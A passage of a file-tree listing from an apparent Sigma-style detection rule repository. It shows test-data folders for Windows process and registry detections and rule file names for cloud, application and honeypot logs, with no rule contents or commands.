│ │ │ │ ├── ccb5742c-c248-4982-8c5c-5571b9275ad3.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_findstr_security_keyword_lookup/
│ │ │ │ ├── 4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx
│ │ │ │ ├── 4fe074b4-b833-4081-8f24-7dcfeca72b42.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_finger_execution/
│ │ │ │ ├── af491bca-e752-4b44-9c86-df5680533dbc.evtx
│ │ │ │ ├── af491bca-e752-4b44-9c86-df5680533dbc.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_github_self_hosted_runner/
│ │ │ │ ├── 5bac7a56-da88-4c27-922e-c81e113b20cb.evtx
│ │ │ │ ├── 5bac7a56-da88-4c27-922e-c81e113b20cb.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_gpresult_execution/
│ │ │ │ ├── e56d3073-83ff-4021-90fe-c658e0709e72.evtx
│ │ │ │ ├── e56d3073-83ff-4021-90fe-c658e0709e72.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_hh_chm_execution/
│ │ │ │ ├── 68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx
│ │ │ │ ├── 68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_hktl_edr_freeze/
│ │ │ │ ├── c598cc0c-9e70-4852-b9eb-8921af79f598.evtx
│ │ │ │ ├── c598cc0c-9e70-4852-b9eb-8921af79f598.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_hktl_wsass/
│ │ │ │ ├── 589ac73f-8e12-409c-964e-31a2f5775ae2.evtx
│ │ │ │ ├── 589ac73f-8e12-409c-964e-31a2f5775ae2.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_hvci_registry_tampering/
│ │ │ │ ├── 6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx
│ │ │ │ ├── 6225c53a-a96e-4235-b28f-8d7997cd96eb.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_adfind_enumeration/
│ │ │ │ ├── 455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx
│ │ │ │ ├── 455b9d50-15a1-4b99-853f-8d37655a4c1b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_adfind_execution/
│ │ │ │ ├── 514e7e3e-b3b4-4a67-af60-be20f139198b.evtx
│ │ │ │ ├── 514e7e3e-b3b4-4a67-af60-be20f139198b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_adfind_susp_usage/
│ │ │ │ ├── 9a132afa-654e-11eb-ae93-0242ac130002.evtx
│ │ │ │ ├── 9a132afa-654e-11eb-ae93-0242ac130002.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_advanced_ip_scanner/
│ │ │ │ ├── bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx
│ │ │ │ ├── bef37fa2-f205-4a7b-b484-0759bfd5f86f.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_advanced_port_scanner/
│ │ │ │ ├── 54773c5f-f1cc-4703-9126-2f797d96a69d.evtx
│ │ │ │ ├── 54773c5f-f1cc-4703-9126-2f797d96a69d.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_advancedrun/
│ │ │ │ ├── d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx
│ │ │ │ ├── d2b749ee-4225-417e-b20e-a8d2193cbb84.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_advancedrun_priv_user/
│ │ │ │ ├── fa00b701-44c6-4679-994d-5a18afa8a707.evtx
│ │ │ │ ├── fa00b701-44c6-4679-994d-5a18afa8a707.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_pua_kdu_driver_tool/
│ │ │ │ ├── e76ca062-4de0-4d79-8d90-160a0d335eca.evtx
│ │ │ │ ├── e76ca062-4de0-4d79-8d90-160a0d335eca.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_reg_add_run_key/
│ │ │ │ ├── de587dce-915e-4218-aac4-835ca6af6f70.evtx
│ │ │ │ ├── de587dce-915e-4218-aac4-835ca6af6f70.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_reg_add_safeboot/
│ │ │ │ ├── d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx
│ │ │ │ ├── d7662ff6-9e97-4596-a61d-9839e32dee8d.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_reg_system_language_discovery/
│ │ │ │ ├── c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx
│ │ │ │ ├── c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_registry_special_accounts_hide_user/
│ │ │ │ ├── 9ec9fb1b-e059-4489-9642-f270c207923d.evtx
│ │ │ │ ├── 9ec9fb1b-e059-4489-9642-f270c207923d.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_adfind/
│ │ │ │ ├── df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx
│ │ │ │ ├── df55196f-f105-44d3-a675-e9dfb6cc2f2b.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_binary/
│ │ │ │ ├── 36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx
│ │ │ │ ├── 36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_binary_highly_relevant/
│ │ │ │ ├── 0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx
│ │ │ │ ├── 0ba1da6d-b6ce-4366-828c-18826c9de23e.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_curl/
│ │ │ │ ├── 7530cd3d-7671-43e3-b209-976966f6ea48.evtx
│ │ │ │ ├── 7530cd3d-7671-43e3-b209-976966f6ea48.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_ftp/
│ │ │ │ ├── 277a4393-446c-449a-b0ed-7fdc7795244c.evtx
│ │ │ │ ├── 277a4393-446c-449a-b0ed-7fdc7795244c.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_renamed_msdt/
│ │ │ │ ├── bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx
│ │ │ │ ├── bd1c6866-65fc-44b2-be51-5588fcff82b9.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_sc_stop_service/
│ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx
│ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.json
│ │ │ │ ├── 81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_susp_eventlog_content_recon/
│ │ │ │ ├── beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx
│ │ │ │ ├── beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_susp_system_exe_anomaly/
│ │ │ │ ├── e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx
│ │ │ │ ├── e4a6b256-3e47-40fc-89d2-7a477edd6915.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_svchost_masqueraded_execution/
│ │ │ │ ├── be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx
│ │ │ │ ├── be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_user_shell_folders_registry_modification/
│ │ │ │ ├── 8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx
│ │ │ │ ├── 8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json
│ │ │ │ └── info.yml
│ │ │ ├── proc_creation_win_vulnerable_driver_blocklist_registry_tampering/
│ │ │ │ ├── 22154f0e-5132-4a54-aa78-cc62f6def531.evtx
│ │ │ │ ├── 22154f0e-5132-4a54-aa78-cc62f6def531.json
│ │ │ │ └── info.yml
│ │ │ └── proc_creation_win_werfaultsecure_abuse/
│ │ │ ├── 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx
│ │ │ ├── 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json
│ │ │ └── info.yml
│ │ ├── registry/
│ │ │ ├── registry_delete/
│ │ │ │ ├── registry_delete_disable_credential_guard/
│ │ │ │ │ ├── d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx
│ │ │ │ │ ├── d645ef86-2396-48a1-a2b6-b629ca3f57ff.json
│ │ │ │ │ └── info.yml
│ │ │ │ ├── registry_delete_removal_amsi_registry_key/
│ │ │ │ │ ├── 41d1058a-aea7-4952-9293-29eaaf516465.evtx
│ │ │ │ │ ├── 41d1058a-aea7-4952-9293-29eaaf516465.json
│ │ │ │ │ └── info.yml
│ │ │ │ ├── registry_delete_runmru/
│ │ │ │ │ ├── 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx
│ │ │ │ │ ├── 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json
│ │ │ │ │ └── info.yml
│ │ │ │ ├── registry_delete_schtasks_hide_task_via_index_value_removal/
│ │ │ │ │ ├── 526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx
│ │ │ │ │ ├── 526cc8bc-1cdc-48ad-8b26-f19bff969cec.json
│ │ │ │ │ └── info.yml
│ │ │ │ └── registry_delete_schtasks_hide_task_via_sd_value_removal/
│ │ │ │ ├── acd74772-5f88-45c7-956b-6a7b36c294d2.evtx
│ │ │ │ ├── acd74772-5f88-45c7-956b-6a7b36c294d2.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_event/
│ │ │ │ └── registry_event_add_local_hidden_user/
│ │ │ │ ├── 460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx
│ │ │ │ ├── 460479f3-80b7-42da-9c43-2cc1d54dbccd.json
│ │ │ │ └── info.yml
│ │ │ └── registry_set/
│ │ │ ├── registry_set_add_load_service_in_safe_mode/
│ │ │ │ ├── 1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx
│ │ │ │ ├── 1547e27c-3974-43e2-a7d7-7f484fb928ec.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_add_port_monitor/
│ │ │ │ ├── 944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx
│ │ │ │ ├── 944e8941-f6f6-4ee8-ac05-1c224e923c0e.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_allow_rdp_remote_assistance_feature/
│ │ │ │ ├── 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx
│ │ │ │ ├── 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_amsi_disable/
│ │ │ │ ├── aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx
│ │ │ │ ├── aa37cbb0-da36-42cb-a90f-fdf216fc7467.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_bypass_uac_using_delegateexecute/
│ │ │ │ ├── 46dd5308-4572-4d12-aa43-8938f0184d4f.evtx
│ │ │ │ ├── 46dd5308-4572-4d12-aa43-8938f0184d4f.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_bypass_uac_using_eventviewer/
│ │ │ │ ├── 674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx
│ │ │ │ ├── 674202d0-b22a-4af4-ae5f-2eda1f3da1af.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_bypass_uac_using_silentcleanup_task/
│ │ │ │ ├── 724ea201-6514-4f38-9739-e5973c34f49a.evtx
│ │ │ │ ├── 724ea201-6514-4f38-9739-e5973c34f49a.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_change_rdp_port/
│ │ │ │ ├── 509e84b9-a71a-40e0-834f-05470369bd1e.evtx
│ │ │ │ ├── 509e84b9-a71a-40e0-834f-05470369bd1e.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_change_security_zones/
│ │ │ │ ├── 45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx
│ │ │ │ ├── 45e112d0-7759-4c2a-aa36-9f8fb79d3393.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_credential_guard_disabled/
│ │ │ │ ├── 73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx
│ │ │ │ ├── 73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/
│ │ │ │ ├── 8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx
│ │ │ │ ├── 8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_disable_administrative_share/
│ │ │ │ ├── c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx
│ │ │ │ ├── c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_disable_defender_firewall/
│ │ │ │ ├── 974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx
│ │ │ │ ├── 974515da-6cc5-4c95-ae65-f97f9150ec7f.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_disable_security_center_notifications/
│ │ │ │ ├── 3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx
│ │ │ │ ├── 3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_persistence_amsi_providers/
│ │ │ │ ├── 33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx
│ │ │ │ ├── 33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_persistence_com_key_linking/
│ │ │ │ ├── 9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx
│ │ │ │ ├── 9b0f8a61-91b2-464f-aceb-0527e0a45020.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_persistence_logon_scripts_userinitmprlogonscript/
│ │ │ │ ├── 9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx
│ │ │ │ ├── 9ace0707-b560-49b8-b6ca-5148b42f39fb.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_powershell_logging_disabled/
│ │ │ │ ├── fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx
│ │ │ │ ├── fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_pua_sysinternals_execution_via_eula/
│ │ │ │ ├── 25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx
│ │ │ │ ├── 25ffa65d-76d8-4da5-a832-3f2b0136e133.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_pua_sysinternals_renamed_execution_via_eula/
│ │ │ │ ├── f50f3c09-557d-492d-81db-9064a8d4e211.evtx
│ │ │ │ ├── f50f3c09-557d-492d-81db-9064a8d4e211.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_pua_sysinternals_susp_execution_via_eula/
│ │ │ │ ├── c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx
│ │ │ │ ├── c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_special_accounts/
│ │ │ │ ├── f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx
│ │ │ │ ├── f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json
│ │ │ │ └── info.yml
│ │ │ ├── registry_set_susp_user_shell_folders/
│ │ │ │ ├── 9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx
│ │ │ │ ├── 9c226817-8dc9-46c2-a58d-66655aafd7dc.json
│ │ │ │ └── info.yml
│ │ │ └── registry_set_vulnerable_driver_blocklist_disable/
│ │ │ ├── d526c60a-e236-4011-b165-831ffa52ab70.evtx
│ │ │ ├── d526c60a-e236-4011-b165-831ffa52ab70.json
│ │ │ └── info.yml
│ │ └── sysmon/
│ │ └── sysmon_config_modification/
│ │ ├── 8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx
│ │ ├── 8ac03a65-6c84-4116-acad-dc1558ff7a77.json
│ │ └── info.yml
│ ├── rules-emerging-threats/
│ │ └── 2025/
│ │ ├── Exploits/
│ │ │ └── CVE-2025-55182/
│ │ │ └── proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/
│ │ │ ├── 271de298-cc0e-4842-acd8-079a0a99ea65.evtx
│ │ │ ├── 271de298-cc0e-4842-acd8-079a0a99ea65.json
│ │ │ └── info.yml
│ │ └── Malware/
│ │ └── Grixba/
│ │ └── proc_creation_win_malware_grixba_recon/
│ │ ├── af688c76-4ce4-4309-bfdd-e896f01acf27.evtx
│ │ ├── af688c76-4ce4-4309-bfdd-e896f01acf27.json
│ │ └── info.yml
│ └── rules-threat-hunting/
│ └── windows/
│ └── image_load/
│ └── image_load_win_werfaultsecure_dbgcore_dbghelp_load/
│ ├── 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx
│ ├── 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json
│ └── info.yml
├── rules/
│ ├── README.md
│ ├── application/
│ │ ├── bitbucket/
│ │ │ └── audit/
│ │ │ ├── bitbucket_audit_full_data_export_triggered.yml
│ │ │ ├── bitbucket_audit_global_permissions_change_detected.yml
│ │ │ ├── bitbucket_audit_global_secret_scanning_rule_deleted.yml
│ │ │ ├── bitbucket_audit_global_ssh_settings_change_detected.yml
│ │ │ ├── bitbucket_audit_log_configuration_update_detected.yml
│ │ │ ├── bitbucket_audit_project_secret_scanning_allowlist_added.yml
│ │ │ ├── bitbucket_audit_secret_scanning_exempt_repository_detected.yml
│ │ │ ├── bitbucket_audit_secret_scanning_rule_deleted.yml
│ │ │ ├── bitbucket_audit_unauthorized_access_detected.yml
│ │ │ ├── bitbucket_audit_unauthorized_full_data_export_triggered.yml
│ │ │ ├── bitbucket_audit_user_details_export_attempt_detected.yml
│ │ │ ├── bitbucket_audit_user_login_failure_detected.yml
│ │ │ ├── bitbucket_audit_user_login_failure_via_ssh_detected.yml
│ │ │ └── bitbucket_audit_user_permissions_export_attempt_detected.yml
│ │ ├── django/
│ │ │ └── appframework_django_exceptions.yml
│ │ ├── github/
│ │ │ └── audit/
│ │ │ ├── github_delete_action_invoked.yml
│ │ │ ├── github_disable_high_risk_configuration.yml
│ │ │ ├── github_disabled_outdated_dependency_or_vulnerability.yml
│ │ │ ├── github_fork_private_repos_enabled_or_cleared.yml
│ │ │ ├── github_new_org_member.yml
│ │ │ ├── github_new_secret_created.yml
│ │ │ ├── github_outside_collaborator_detected.yml
│ │ │ ├── github_pages_site_changed_to_public.yml
│ │ │ ├── github_push_protection_bypass_detected.yml
│ │ │ ├── github_push_protection_disabled.yml
│ │ │ ├── github_repo_or_org_transferred.yml
│ │ │ ├── github_repository_archive_status_changed.yml
│ │ │ ├── github_secret_scanning_feature_disabled.yml
│ │ │ ├── github_self_hosted_runner_changes_detected.yml
│ │ │ └── github_ssh_certificate_config_changed.yml
│ │ ├── jvm/
│ │ │ ├── java_jndi_injection_exploitation_attempt.yml
│ │ │ ├── java_local_file_read.yml
│ │ │ ├── java_ognl_injection_exploitation_attempt.yml
│ │ │ ├── java_rce_exploitation_attempt.yml
│ │ │ └── java_xxe_exploitation_attempt.yml
│ │ ├── kubernetes/
│ │ │ └── audit/
│ │ │ ├── kubernetes_audit_change_admission_controller.yml
│ │ │ ├── kubernetes_audit_cronjob_modification.yml
│ │ │ ├── kubernetes_audit_deployment_deleted.yml
│ │ │ ├── kubernetes_audit_events_deleted.yml
│ │ │ ├── kubernetes_audit_exec_into_container.yml
│ │ │ ├── kubernetes_audit_hostpath_mount.yml
│ │ │ ├── kubernetes_audit_pod_in_system_namespace.yml
│ │ │ ├── kubernetes_audit_privileged_pod_creation.yml
│ │ │ ├── kubernetes_audit_rbac_permisions_listing.yml
│ │ │ ├── kubernetes_audit_rolebinding_modification.yml
│ │ │ ├── kubernetes_audit_secrets_enumeration.yml
│ │ │ ├── kubernetes_audit_secrets_modified_or_deleted.yml
│ │ │ ├── kubernetes_audit_serviceaccount_creation.yml
│ │ │ ├── kubernetes_audit_sidecar_injection.yml
│ │ │ └── kubernetes_audit_unauthorized_unauthenticated_actions.yml
│ │ ├── nodejs/
│ │ │ └── nodejs_rce_exploitation_attempt.yml
│ │ ├── opencanary/
│ │ │ ├── opencanary_ftp_login_attempt.yml
│ │ │ ├── opencanary_git_clone_request.yml
│ │ │ ├── opencanary_http_get.yml
│ │ │ ├── opencanary_http_post_login_attempt.yml
│ │ │ ├── opencanary_httpproxy_login_attempt.yml
│ │ │ ├── opencanary_mssql_login_sqlauth.yml
│ │ │ ├── opencanary_mssql_login_winauth.yml
│ │ │ ├── opencanary_mysql_login_attempt.yml
│ │ │ ├── opencanary_ntp_monlist.yml
│ │ │ ├── opencanary_portscan_nmap_fin_scan.yaml
│ │ │ ├── opencanary_portscan_nmap_null_scan.yaml
│ │ │ ├── opencanary_portscan_nmap_os_scan.yaml
│ │ │ ├── opencanary_portscan_nmap_xmas_scan.yaml
│ │ │ ├── opencanary_portscan_syn_scan.yaml
│ │ │ ├── opencanary_rdp_connection_attempt.yaml
│ │ │ ├── opencanary_redis_command.yml
│ │ │ ├── opencanary_sip_request.yml
│ │ │ ├── opencanary_smb_file_open.yml
│ │ │ ├── opencanary_snmp_cmd.yml
│ │ │ ├── opencanary_ssh_login_attempt.yml
│ │ │ ├── opencanary_ssh_new_connection.yml
│ │ │ ├── opencanary_telnet_login_attempt.yml
│ │ │ ├── opencanary_tftp_request.yml
│ │ │ └── opencanary_vnc_connection_attempt.yml
│ │ ├── python/
│ │ │ └── app_python_sql_exceptions.yml
│ │ ├── rpc_firewall/
│ │ │ ├── rpc_firewall_atsvc_lateral_movement.yml
│ │ │ ├── rpc_firewall_atsvc_recon.yml
│ │ │ ├── rpc_firewall_dcsync_attack.yml
│ │ │ ├── rpc_firewall_efs_abuse.yml
│ │ │ ├── rpc_firewall_eventlog_recon.yml
│ │ │ ├── rpc_firewall_itaskschedulerservice_lateral_movement.yml
│ │ │ ├── rpc_firewall_itaskschedulerservice_recon.yml
│ │ │ ├── rpc_firewall_printing_lateral_movement.yml
│ │ │ ├── rpc_firewall_remote_dcom_or_wmi.yml
│ │ │ ├── rpc_firewall_remote_registry_lateral_movement.yml
│ │ │ ├── rpc_firewall_remote_registry_recon.yml
│ │ │ ├── rpc_firewall_remote_server_service_abuse.yml
│ │ │ ├── rpc_firewall_remote_service_lateral_movement.yml
│ │ │ ├── rpc_firewall_sasec_lateral_movement.yml
│ │ │ ├── rpc_firewall_sasec_recon.yml
│ │ │ ├── rpc_firewall_sharphound_recon_account.yml
│ │ │ └── rpc_firewall_sharphound_recon_sessions.yml
│ │ ├── ruby/
│ │ │ └── appframework_ruby_on_rails_exceptions.yml
│ │ ├── spring/
│ │ │ ├── spring_application_exceptions.yml
│ │ │ └── spring_spel_injection.yml
│ │ ├── sql/
│ │ │ └── app_sqlinjection_errors.yml
│ │ └── velocity/
│ │ └── velocity_ssti_injection.yml
│ ├── category/
│ │ ├── antivirus/
│ │ │ ├── av_exploiting.yml
│ │ │ ├── av_hacktool.yml
│ │ │ ├── av_password_dumper.yml
│ │ │ ├── av_ransomware.yml
│ │ │ ├── av_relevant_files.yml
│ │ │ └── av_webshell.yml
│ │ └── database/
│ │ └── db_anomalous_query.yml
│ ├── cloud/
│ │ ├── aws/
│ │ │ └── cloudtrail/
│ │ │ ├── aws_cloudtrail_bucket_deleted.yml
│ │ │ ├── aws_cloudtrail_console_login_failed_authentication.yml
│ │ │ ├── aws_cloudtrail_console_login_success_without_mfa.yml
│ │ │ ├── aws_cloudtrail_disable_logging.yml
│ │ │ ├── aws_cloudtrail_guardduty_detector_deleted_or_updated.yml
│ │ │ ├── aws_cloudtrail_imds_malicious_usage.yml
│ │ │ ├── aws_cloudtrail_new_acl_entries.yml
│ │ │ ├── aws_cloudtrail_new_route_added.yml
│ │ │ ├── aws_cloudtrail_pua_trufflehog.yml
│ │ │ ├── aws_cloudtrail_region_enabled.yml
│ │ │ ├── aws_cloudtrail_security_group_change_ingress_egress.yml
│ │ │ ├── aws_cloudtrail_security_group_change_loadbalancer.yml
│ │ │ ├── aws_cloudtrail_security_group_change_rds.yml
│ │ │ ├── aws_cloudtrail_ssm_malicious_usage.yml
│ │ │ ├── aws_cloudtrail_vpc_flow_logs_deleted.yml
│ │ │ ├── aws_config_disable_recording.yml
│ │ │ ├── aws_console_getsignintoken.yml
│ │ │ ├── aws_delete_identity.yml
│ │ │ ├── aws_delete_saml_provider.yml
│ │ │ ├── aws_disable_bucket_versioning.yml
│ │ │ ├── aws_ec2_disable_encryption.yml
│ │ │ ├── aws_ec2_import_key_pair_activity.yml
│ │ │ ├── aws_ec2_startup_script_change.yml
│ │ │ ├── aws_ec2_vm_export_failure.yml
│ │ │ ├── aws_ecs_task_definition_cred_endpoint_query.yml
│ │ │ ├── aws_efs_fileshare_modified_or_deleted.yml
│ │ │ ├── aws_efs_fileshare_mount_modified_or_deleted.yml
│ │ │ ├── aws_eks_cluster_created_or_deleted.yml
│ │ │ ├── aws_elasticache_security_group_created.yml
│ │ │ ├── aws_elasticache_security_group_modified_or_deleted.yml
│ │ │ ├── aws_enum_buckets.yml
│ │ │ ├── aws_guardduty_disruption.yml
│ │ │ ├── aws_iam_backdoor_users_keys.yml
│ │ │ ├── aws_iam_s3browser_loginprofile_creation.yml
│ │ │ ├── aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
│ │ │ ├── aws_iam_s3browser_user_or_accesskey_creation.yml
│ │ │ ├── aws_kms_import_key_material.yml
│ │ │ ├── aws_lambda_function_url.yml
│ │ │ ├── aws_new_lambda_layer_attached.yml
│ │ │ ├── aws_passed_role_to_glue_development_endpoint.yml
│ │ │ ├── aws_rds_change_master_password.yml
│ │ │ ├── aws_rds_dbcluster_actions.yml
│ │ │ ├── aws_rds_public_db_restore.yml
│ │ │ ├── aws_root_account_usage.yml
│ │ │ ├── aws_route_53_domain_transferred_lock_disabled.yml
│ │ │ ├── aws_route_53_domain_transferred_to_another_account.yml
│ │ │ ├── aws_s3_data_management_tampering.yml
│ │ │ ├── aws_securityhub_finding_evasion.yml
│ │ │ ├── aws_snapshot_backup_exfiltration.yml
│ │ │ ├── aws_sso_idp_change.yml
│ │ │ ├── aws_sts_assumerole_misuse.yml
│ │ │ ├── aws_sts_getcalleridentity_trufflehog.yml
│ │ │ ├── aws_sts_getsessiontoken_misuse.yml
│ │ │ ├── aws_susp_saml_activity.yml
│ │ │ └── aws_update_login_profile.yml
│ │ ├── azure/
│ │ │ ├── activity_logs/
│ │ │ │ ├── azure_aadhybridhealth_adfs_new_server.yml
│ │ │ │ ├── azure_aadhybridhealth_adfs_service_delete.yml
│ │ │ │ ├── azure_ad_user_added_to_admin_role.yml
│ │ │ │ ├── azure_application_deleted.yml
│ │ │ │ ├── azure_application_gateway_modified_or_deleted.yml
│ │ │ │ ├── azure_application_security_group_modified_or_deleted.yml
│ │ │ │ ├── azure_container_registry_created_or_deleted.yml
│ │ │ │ ├── azure_creating_number_of_resources_detection.yml
│ │ │ │ ├── azure_device_no_longer_managed_or_compliant.yml
│ │ │ │ ├── azure_device_or_configuration_modified_or_deleted.yml
│ │ │ │ ├── azure_dns_zone_modified_or_deleted.yml
│ │ │ │ ├── azure_firewall_modified_or_deleted.yml
│ │ │ │ ├── azure_firewall_rule_collection_modified_or_deleted.yml
│ │ │ │ ├── azure_granting_permission_detection.yml
│ │ │ │ ├── azure_keyvault_key_modified_or_deleted.yml
│ │ │ │ ├── azure_keyvault_modified_or_deleted.yml
│ │ │ │ ├── azure_keyvault_secrets_modified_or_deleted.yml
│ │ │ │ ├── azure_kubernetes_admission_controller.yml
│ │ │ │ ├── azure_kubernetes_cluster_created_or_deleted.yml
│ │ │ │ ├── azure_kubernetes_cronjob.yml
│ │ │ │ ├── azure_kubernetes_events_deleted.yml
│ │ │ │ ├── azure_kubernetes_network_policy_change.yml
│ │ │ │ ├── azure_kubernetes_pods_deleted.yml
│ │ │ │ ├── azure_kubernetes_role_access.yml
│ │ │ │ ├── azure_kubernetes_rolebinding_modified_or_deleted.yml
│ │ │ │ ├── azure_kubernetes_secret_or_config_object_access.yml
│ │ │ │ ├── azure_kubernetes_service_account_modified_or_deleted.yml
│ │ │ │ ├── azure_mfa_disabled.yml
│ │ │ │ ├── azure_network_firewall_policy_modified_or_deleted.yml
│ │ │ │ ├── azure_network_firewall_rule_modified_or_deleted.yml
│ │ │ │ ├── azure_network_p2s_vpn_modified_or_deleted.yml
│ │ │ │ ├── azure_network_security_modified_or_deleted.yml
│ │ │ │ ├── azure_network_virtual_device_modified_or_deleted.yml
│ │ │ │ ├── azure_new_cloudshell_created.yml
│ │ │ │ ├── azure_owner_removed_from_application_or_service_principal.yml
│ │ │ │ ├── azure_rare_operations.yml
│ │ │ │ ├── azure_service_principal_created.yml
│ │ │ │ ├── azure_service_principal_removed.yml
│ │ │ │ ├── azure_subscription_permissions_elevation_via_activitylogs.yml
│ │ │ │ ├── azure_suppression_rule_created.yml
│ │ │ │ ├── azure_virtual_network_modified_or_deleted.yml
│ │ │ │ └── azure_vpn_connection_modified_or_deleted.yml
│ │ │ ├── audit_logs/
